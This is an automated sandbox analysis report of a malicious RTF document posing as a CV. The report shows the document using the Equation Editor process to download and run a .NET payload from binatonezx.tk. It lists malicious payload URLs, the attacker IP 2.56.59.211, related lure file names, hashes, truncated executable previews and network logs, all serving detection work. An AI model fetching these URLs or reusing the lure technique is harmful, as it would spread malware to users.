                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 12m 1s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:C.V_Job Request.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winDOC@9/10@2/1
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 21.6% (good quality ratio 20.9%)
                                              • Quality average: 78.7%
                                              • Quality standard deviation: 25.8%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                              • TCP Packets have been reduced to 100
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              16:42:19API Interceptor47x Sleep call for process: EQNEDT32.EXE modified
                                              16:42:21API Interceptor74x Sleep call for process: seasonhd72463.exe modified
                                              16:42:45API Interceptor117x Sleep call for process: msiexec.exe modified
                                              16:44:16API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              2.56.59.211Purchase order.docGet hashmaliciousBrowse
                                              • binatonezx.tk/villarzx.exe
                                              Swift-copy.docGet hashmaliciousBrowse
                                              • binatonezx.tk/obinnazx.exe
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • binatonezx.tk/stanzx.exe
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • binatonezx.tk/catzx.exe
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • binatonezx.tk/seasonzx.exe
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • binatonezx.tk/villarzx.exe
                                              payment.docGet hashmaliciousBrowse
                                              • binatonezx.tk/davidhillzx.exe
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • binatonezx.tk/trulexzx.exe
                                              FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                                              • binatonezx.tk/asadzx.exe
                                              QUOTE B1018530.docGet hashmaliciousBrowse
                                              • binatonezx.tk/mazx.exe
                                              About company.docGet hashmaliciousBrowse
                                              • binatonezx.tk/gregzx.exe
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • binatonezx.tk/catzx.exe
                                              PRICE QUOTATION.docGet hashmaliciousBrowse
                                              • binatonezx.tk/seasonzx.exe
                                              PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                                              • binatonezx.tk/obinnazx.exe
                                              Purchase Order.docGet hashmaliciousBrowse
                                              • binatonezx.tk/villarzx.exe

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              binatonezx.tkPurchase order.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Swift-copy.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              payment.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              FLOW LINE CONTRACT00939.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              QUOTE B1018530.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              About company.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              PRICE QUOTATION.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              PROFORMA INVOICE.doc__.rtfGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase Order.docGet hashmaliciousBrowse
                                              • 2.56.59.211

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              GBTCLOUDUSPurchase order.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              setup_installer.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              Swift-copy.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              jGK42jrs2j.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              p3IJWYfJZw.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              RFQ for _RTO system packages product details.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Purchase order_122.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              SMC Req Offer.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              Original Shipping documents.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              6FD5C640F4C1E434978FDC59A8EC191134B7155217C84.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              setup_x86_x64_install.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              0OeX2BsbUo.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              AB948F038175411DC326A1AAD83DF48D6B65632501551.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              365F984ABE68DDD398D7B749FB0E69B0F29DAF86F0E3E.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              C03C8A4852301C1C54ED27EF130D0DE4CDFB98584ADEF.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              Fri051e1e7444.exeGet hashmaliciousBrowse
                                              • 2.56.59.42
                                              payment.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              _Payment Advise.docGet hashmaliciousBrowse
                                              • 2.56.59.211
                                              wA5D1yZuTf.exeGet hashmaliciousBrowse
                                              • 2.56.59.42

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):526336
                                              Entropy (8bit):7.5320170434389455
                                              Encrypted:false
                                              SSDEEP:12288:PG9ImHKQ6MQ0vN3h4Ip/uzEcrPuRj42GT:eJGA3h4Ip/uzrPAbG
                                              MD5:9227463FFB6E37D271919E06D175EDA7
                                              SHA1:549CCA1BD4031F3D302832754A1F3E51FFED065F
                                              SHA-256:5E529CBB901ACED8A6AF49250AFD3D67E059D717D7ECF3EDC32E18A9D549361C
                                              SHA-512:3C2673D5CA3BE9C723B8D34185299459A53F0D99B3F8ABD2821B73299D6DE83257CD4E850AC635C53598EB8CBD9574EE103B781C7C6952B69F2C6EE8C9B3E60B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 23%
                                              Reputation:low
                                              IE Cache URL:http://binatonezx.tk/seasonzx.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0.............>.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H..................t....|..............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):177152
                                              Entropy (8bit):7.968894553436934
                                              Encrypted:false
                                              SSDEEP:3072:5r+OFkZ8MtvknSS6grNZM3dVeqIoUxnVWWwRJZgaepJWma515A:5x27JkSS6KNZSXVnWSoaKam
                                              MD5:A6222C96BEC0E96BECCD2EF405CBC8C4
                                              SHA1:442B799CBCA7A1D526C31AB2B82C0C3E452AFF23
                                              SHA-256:6F64549B2D015CCA2E0CCDBAAFE166640C004367D2F75B316D7620EEB597083C
                                              SHA-512:3FAADCE5A243020431C5B191ABE03610AECA2AA6271C6E5B040749F5A510FA6BB929F0B722D0D1C2047F2D00F1C319284AC1268659BC22FB5E6F5799C4ED88A9
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              Preview: ......................>.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F12DB12-48BF-46DA-B084-D7B910635C9B}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{99A74BA1-7084-4250-8A29-E85A11395DDC}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):13312
                                              Entropy (8bit):3.5864344325374753
                                              Encrypted:false
                                              SSDEEP:384:db9nvMlWW4cPwZY8APS+oX9Y52wBvvTKBkZ:db9nvsgcPwOPUY5HBGBkZ
                                              MD5:99BD4E7DE3940A04A671C43E8132D001
                                              SHA1:8518B09DEDC04133804F6E6F538C83A2FACC0208
                                              SHA-256:FB31FF316F5CD02FA92BB0153268076174D356631D2AF4B8D41F5231720ABEAB
                                              SHA-512:BC6D7FD0AE073CE562A627E0F7C060F4CB1898CDD34F9B53251B3FBC507A132BDEA824E34EE33A8091D95197C5B66FEEE1BA0AF1328F0B0A7AE653CFA11E4633
                                              Malicious:false
                                              Reputation:low
                                              Preview: ).=.7.#.%.&.1.?.0.>.3.`.,.(.?.5.-.7.`.!.9.=.).9...).1.?.$.`.!.].6.?.`.|.`.4.?.%.<.0.....3.#.3.5.4.8.?.-.<.,.8.%.*.+.?.!.9.5.=.2.[.@.3.5.0.'.0.>...9.!.&.-.6.?.3.5.#.4.~./...+.,.=.|.].(.7.5.1.].<.?.%.?.6...].|.6.#.-.].6.^.0...?.~.*.,.9.*.7.6.`.7.8._.?./.$.?.`...%.2.2.9.1.*...~.!.~.....).1.$.'.'.?.>.2..._.).@.?.6.+.>.>.-.5...$.-.?.#.`.5...*.(.1.#.^.|.'.$.?.+.#.&.&.7...|.2.=.?.^.!.#.(...'.^..._...`./.;.).@.`.0.9.|.%.&.|.-.&.9.&.8.'.`...=...).:.>.&.[.[.>...#.).^.%.`.7.3.2.3.`.`.?.].?.4.,.^.6.-.]...?.2.?...$.`.[.-.(.#._.!.].#.?.<.;.-.<.?.~.[.^.%...$.?.?...$.<.%.^.9.6.#.!.@.9.~.&.?.7.).-.^.?._.?.(.8.-.?...?.2.;.|.^.^.|.%.9.?.%._...?.&.].6.[.:...?...#.,.~.:.>...;.%.'.#.+.,._.2.?._.?.*.[.@.&.,.9.)...9.^.>.;./.:.&.$.!.^.4.8...=.).9.'.(.?.?.+.1.1.*.[.8.?.2.+.%.0.>.%...^.0.*.%.~.(.6.~...#.*.:.,.8.<.[.).6.+.1.5.6.$.:._.'.).@...#.!.0...%.].8...6.4.!.`.8...&.8._.#.|.[./...|...9.,.4.?.<.[.9.@.(.3...|.3...;.^.4.`.[.^.1.0.%.:.?.%.:.9.^.|.%.=.[.`.9.?.=.8.(.8.>.`.?.-.?.3...%.?./.,...;.<.(.3.?.2.`.^.?.;.6.
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BE99F549-07B9-491A-8DB9-68BEA2AC23A8}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3586208805849453
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbu:IiiiiiiiiifdLloZQc8++lsJe1Mz1/
                                              MD5:3DEAB1D660801EC3E5A2A85121BD0100
                                              SHA1:AA76E24361F626EB979536BF41369287FE7F6444
                                              SHA-256:682A68677DC3D843BDF8F1F3A3CF56B748E35B976F4AD01115619A6CD080BC7D
                                              SHA-512:4F5A6BA6878C88BD08B726EB71FA0C7682E78DC5DA93CE63C33290C8A2F9375CD94FFC2C3BADEF6A04C1AC7CFBE0EFAE7BB945F2D9B1A1BBB60F80F9CB84A072
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\C.V_Job Request.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Wed Oct 27 22:42:17 2021, length=445393, window=hide
                                              Category:dropped
                                              Size (bytes):1039
                                              Entropy (8bit):4.5731093684743485
                                              Encrypted:false
                                              SSDEEP:24:8P8G0n/XTuzLIZ+GLNJeGOLzDv3qoE/7Eg:8P8G0n/XTkuNJi6oWB
                                              MD5:66DF0B78A634B21C0034107A4983E87D
                                              SHA1:3FD37B0E445CB40504527400517ECACB0C9EB0FD
                                              SHA-256:5A4483E851FB70C0B2AC567FADD2AFBEDC73F22E1CD83A0B744D8C7C4532C2EF
                                              SHA-512:8FB8421FF12EBC63933F961D0465D2F1A368C9E0569BD34D006C9EF81466BB674F7C49E403DF748EE7B76A3C4E0ECE515D4604CE7E9F7C7ACD80E9878F170472
                                              Malicious:false
                                              Preview: L..................F.... ......?......?....^.F.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S ...user.8......QK.X.S .*...&=....U...............A.l.b.u.s.....z.1......S!...Desktop.d......QK.X.S!.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.....[SI. .CV_JOB~1.DOC..T.......S ..S .*.........................C...V._.J.o.b. .R.e.q.u.e.s.t...d.o.c.......}...............-...8...[............?J......C:\Users\..#...................\\715575\Users.user\Desktop\C.V_Job Request.doc.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C...V._.J.o.b. .R.e.q.u.e.s.t...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......715575..........D_....3N...W...9..g..........
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):81
                                              Entropy (8bit):4.796519991888395
                                              Encrypted:false
                                              SSDEEP:3:bDuMJl+LzBXo2mX1Z8Xo2v:bCBlS+L
                                              MD5:B78115C5999CBD22895610ED925C66F5
                                              SHA1:1EFDA182CFA86793A126100070301C1D1AD4C40C
                                              SHA-256:BEFE43765F3B3397789933ACDC7CAF5C0F3591BC8803A65DA48171831985985F
                                              SHA-512:1412AB4C2A622BFB8BD89DBC36277F6025E7823614C25B6BD5B3305D8B26B5BD9A0CF31913EB70998A1551EE2485DFDA512364765994D84E72CAD11A469AD827
                                              Malicious:false
                                              Preview: [folders]..Templates.LNK=0..C.V_Job Request.LNK=0..[doc]..C.V_Job Request.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                              C:\Users\user\AppData\Roaming\seasonhd72463.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):526336
                                              Entropy (8bit):7.5320170434389455
                                              Encrypted:false
                                              SSDEEP:12288:PG9ImHKQ6MQ0vN3h4Ip/uzEcrPuRj42GT:eJGA3h4Ip/uzrPAbG
                                              MD5:9227463FFB6E37D271919E06D175EDA7
                                              SHA1:549CCA1BD4031F3D302832754A1F3E51FFED065F
                                              SHA-256:5E529CBB901ACED8A6AF49250AFD3D67E059D717D7ECF3EDC32E18A9D549361C
                                              SHA-512:3C2673D5CA3BE9C723B8D34185299459A53F0D99B3F8ABD2821B73299D6DE83257CD4E850AC635C53598EB8CBD9574EE103B781C7C6952B69F2C6EE8C9B3E60B
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 23%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....xa..............0.............>.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H..................t....|..............................................&.(......*...0..H.............s..........~..........(......~.........,.s.............,..(......*........#<.......0.............+..*..0...........s.....+..*..0...........sR....+..*..0...........sT....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*..0...........s.....+..*...}......}.....(.......r...p}....*z..}......}.....(........}....*...}......}.....(........}......}....*...}.
                                              C:\Users\user\Desktop\~$V_Job Request.doc
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.5038355507075254
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                              MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                              SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                              SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                              SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                              Malicious:false
                                              Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                              Static File Info

                                              General

                                              File type:Rich Text Format data, unknown version
                                              Entropy (8bit):4.2248396949078435
                                              TrID:
                                              • Rich Text Format (5005/1) 55.56%
                                              • Rich Text Format (4004/1) 44.44%
                                              File name:C.V_Job Request.doc
                                              File size:445393
                                              MD5:b5be29921304476377e096c60a3fb418
                                              SHA1:653d40c3e86feb11b1cc6b7745257754c296c109
                                              SHA256:fd4e52557f511c596e0d0ff58a1a7775a1295889461b73856d4aa733108e7b58
                                              SHA512:987cb27f1b49978d5dae764d61f4a0af9dff31d073e1d2a28c4d2ac2ee1a9772ef5d337878ca1e7fb18aa8d1f67affcd586336b066afff52ad46ce250de4ff97
                                              SSDEEP:6144:XTaxUCbwi30ctNoGw+JhzjbLq1M4iZsuj36wk7OMwBd6c11ONcwB9sal13uxHGMp:X2xUIwvuoD+nfh44xj06T66ObstGcL
                                              File Content Preview:{\rtf7661)=7#%&1?0>3`,(?5-7`!9=)9.)1?$`!]6?`|`4?%<0..3#3548?-<,8%*+?!95=2[@350'0>.9!&-6?35#4~/.+,=|](751]<?%?6.]|6#-]6^0.?~*,9*76`78_?/$?`.%2291*.~!~..)1$''?>2._)@?6+>>-5.$-?#`5.*(1#^|'$?+#&&7.|2=?^!#(.'^._.`/;)@`09|%&|-&9&8'`.=.):>&[[>.#)^%`7323``?]?4,^6

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static RTF Info

                                              Objects

                                              IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                              0000018C9hno
                                              10000187Ch2embeddeda175616no

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 27, 2021 16:42:17.913721085 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.943983078 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.944142103 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.944622040 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.980179071 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983454943 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983525991 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983562946 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.983584881 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.983601093 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983633041 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983658075 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.983678102 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983694077 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.983725071 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983750105 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983773947 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983812094 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983860016 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.983866930 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.983870983 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:17.983933926 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:17.983999014 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.002785921 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.010915041 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.010967016 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011007071 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011027098 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011043072 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011049032 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011193991 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011234999 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011253119 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011281967 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011312008 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011374950 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011449099 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011490107 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011508942 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011650085 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011687994 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011737108 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011749029 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011795044 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011806011 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011868954 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.011936903 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011977911 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.011995077 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.012017965 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.012049913 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.012095928 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.012108088 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.012172937 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.012209892 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.012255907 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.012267113 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.012298107 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.012322903 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.012368917 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.012382030 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.012414932 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.012438059 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.012482882 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.016542912 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048263073 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048317909 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048361063 CEST80491652.56.59.211192.168.2.22
                                              Oct 27, 2021 16:42:18.048384905 CEST4916580192.168.2.222.56.59.211
                                              Oct 27, 2021 16:42:18.048409939 CEST4916580192.168.2.222.56.59.211
